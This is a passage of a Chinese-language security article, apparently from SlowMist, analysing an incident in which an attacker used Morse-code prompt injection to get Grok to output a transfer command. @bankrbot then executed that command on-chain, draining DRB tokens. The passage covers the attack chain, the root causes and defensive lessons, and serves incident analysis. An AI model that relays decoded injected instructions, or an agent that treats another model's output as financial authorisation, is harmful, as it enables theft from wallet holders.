Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">事件中被标记为“Grok 钱包”的地址 (0xb1058c959987e3513600eb5b4fd82aeee2a0e4f9) 并不属于 xAI 官方控制。该地址是由 @bankrbot 为 X 账号 @grok 自动生成的关联钱包，私钥由 Bankr 依赖的第三方钱包服务托管，实际控制权在 Bankr 手中。BaseScan 已将该地址标签由 “Grok” 修正为 Bankr 1 等相关标识。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCJAuDvhc4WjbK3cK9LZmQBBHM3UrI1hQlCLtTHCYwcpKG1ktXLMapDarvNhviaqxx7XnaPtW4hicJBqsRRjbSqibeRhfGPg55v2Q4/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="201" data-imgfileid="100021232" data-ratio="0.35226455787203453" data-s="300,640" data-w="2782" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=cc8835ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJAuDvhc4WjbK3cK9LZmQBBHM3UrI1hQlCLtTHCYwcpKG1ktXLMapDarvNhviaqxx7XnaPtW4hicJBqsRRjbSqibeRhfGPg55v2Q4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;"><a href="https://basescan.org/address/0xb1058c959987e3513600eb5b4fd82aeee2a0e4f9" target="_blank">https://basescan.org/address/0xb1058c959987e3513600eb5b4fd82aeee2a0e4f9</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">该钱包持有的大量 DRB（约 30 亿枚），同样源于 Bankr 的机制设计：今年早些时候，有用户向 Grok 询问代币命名建议，Grok 回复 “DebtReliefBot”（简称 DRB）。随后，Bankr 系统将该回复解析为部署信号，在 Base 链上触发了相关代币的创建流程，并按照其 Launchpad 规则，将创建者份额分配至该关联钱包。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">攻击流程</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次攻击主要分为权限升级和指令注入两个关键阶段，形成了“不可信输入 → AI 输出 → 外部 Agent 执行 → 资产转移”的完整链路。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1.权限升级阶段</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者（关联地址 ilhamrafli.base.eth）通过中心化机制开通了该钱包的 Bankr Club Membership。这一操作解锁了 @bankrbot 的高权限工具集（agentic toolset），为其后续转账执行提供了必要权限。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021216" data-ratio="1.1962025316455696" width="370" data-type="png" data-w="948" height="443" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=cc0949ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJ5zRiaoFhWtt4XGn5iaC82DsxzC1tHzpgBr51M6tF0tKklu95Jvmd7g0JdQPiauwScVy8ZCGfAh9ibU2Biarskt9TlaWbpAJColicicU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(<a href="https://x.com/bankrbot/status/2051005172202258526)" target="_blank">https://x.com/bankrbot/status/2051005172202258526)</a></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2.Prompt Injection 执行阶段</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者向 @grok 发送一段精心构造的摩尔斯电码（Morse Code），Grok 按照用户要求进行翻译/解码后，输出了明文指令并 @bankrbot。@bankrbot 将 Grok 的公开回复视为有效可执行命令，直接在 Base 链上发起转账操作。</span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="100021230" data-ratio="0.41944444444444445" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=4df4c80b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJ32lwg2xJH4pEV1sUqqAYia5MU9icZunTLa9w7z5e5Qs9U3yuUpkEibibRSQNjEVicYPz2WCTUy2u8etNl4gibkQLueoaeDCJqvdgMc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(<a href="https://basescan.org/tx/0x6fc7eb7da9379383efda4253e4f599bbc3a99afed0468eabfe18484ec525739a)" target="_blank">https://basescan.org/tx/0x6fc7eb7da9379383efda4253e4f599bbc3a99afed0468eabfe18484ec525739a)</a></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者随后迅速将 DRB 兑换为 USDC/ETH。攻击完成后，相关账号快速删除内容并下线。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次攻击的巧妙之处在于，充分利用了 Grok 的“帮助性”响应特性，绕过了 @bankrbot 对指令来源的常规过滤，构建起 AI 输出与链上执行的闭环。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 16px;font-weight: bold;">资金追回情况</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">事件发生后，社区与 Bankr 团队追踪显示，约 80%~88% 的资金价值已通过协商形式回流（主要以 USDC 和 ETH 形式）。剩余部分据相关方表述，作为非正式 bug bounty 处理。Bankrbot 已公开确认攻击细节，并采取了相应限制措施。</span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">根本原因分析</span></span></h2><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">信任模型缺陷：Bankrbot 将 Grok 的自然语言输出直接映射为可执行金融指令，而未对指令来源、意图真实性或异常模式（摩尔斯电码等非标准编码）进行充分验证。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">权限隔离不足：会员资格激活直接赋予高危工具权限，缺乏二次确认或额度限制。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Agent 间边界模糊：Grok 作为对话式 AI，其输出本不应等同于金融授权，但被下游执行层视为可信信号。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">输入处理风险：LLM 容易被提示注入或非标准编码绕过安全过滤器，这已是已知问题，但在与真实资产执行层结合时放大为高额损失。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">值得强调的是，Grok 本身并未持有私钥或直接执行链上操作，它更像是被利用的中间环节，真正的执行主体是 @bankrbot 的自动化交易体系。</span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">安全启示</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此次事件为 AI + Crypto Agent 领域提供了重要实战教训：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">自然语言输出必须与金融动作严格解耦；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">高价值操作需引入多重验证、额度控制、异常检测（编码类型、金额阈值、来源白名单等）；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Agent 间交互应优先采用结构化、可验证的协议，而非纯文本指令；</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Prompt Injection 威胁模型需纳入全链路 Agent 设计，包括间接利用其他 AI 的能力。</span></span></p></li></ul><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">总结</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">这是一起典型的 AI Agent 权限链安全事件。尽管 Grok 被 Prompt Injection 利用，但问题的根本在于：Bankrbot 体系中，将 AI 输出与真实资产执行层进行松散绑定。该事件为 AI + Crypto Agent 领域提供了一个极具参考价值的实战案例，也明确传递出一个信号：当 Agent 被赋予链上执行能力时，必须建立严格的信任边界与安全控制机制。未来，相关基础设施的安全设计仍需持续强化，以应对这一类跨系统、跨语义边界的新型攻击模式。</span></span></p></b></b></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾出品｜链接真实世界资产：从协议族解析到安全实践</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504841&amp;idx=1&amp;sn=289fc7c20f2f00f8313ea5a5c378f90f&amp;scene=21#wechat_redirect" textvalue="慢雾 2026 香港 Web3 嘉年华之旅圆满收官!" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 2026 香港 Web3 嘉年华之旅圆满收官!</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504741&amp;idx=1&amp;sn=73749cca984e571fbcd6cac83e515423&amp;scene=21#wechat_redirect" textvalue="专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发" data-itemshowtype="0" linktype="text" data-linktype="2">专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504729&amp;idx=1&amp;sn=aa1c7332bba7ac7bbe4f74220e2322e6&amp;scene=21#wechat_redirect" textvalue="解读｜FBI 发布《2025 年互联网犯罪报告》" data-itemshowtype="0" linktype="text" data-linktype="2">解读｜FBI 发布《2025 年互联网犯罪报告》</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



